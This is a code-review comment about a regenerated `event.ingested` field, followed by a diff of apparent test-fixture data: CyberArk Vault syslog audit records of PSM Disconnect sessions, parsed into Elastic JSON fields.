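Review bot: `event.ingested` is rewritten in this hunk only because the fixture was regenerated (2021-06-09 to 2021-12-09); it asserts nothing about the pipeline and will change again on every regeneration, burying real output changes in noise. If the pipeline test configuration for this data stream supports declaring dynamic fields, listing `event.ingested` there would exclude it from the comparison and from future diffs. This is the only occurrence in the visible chunk, but the same applies to every event in the file.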
@@ -1,16 +1,16 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM 
Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:34:50Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n 
Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n 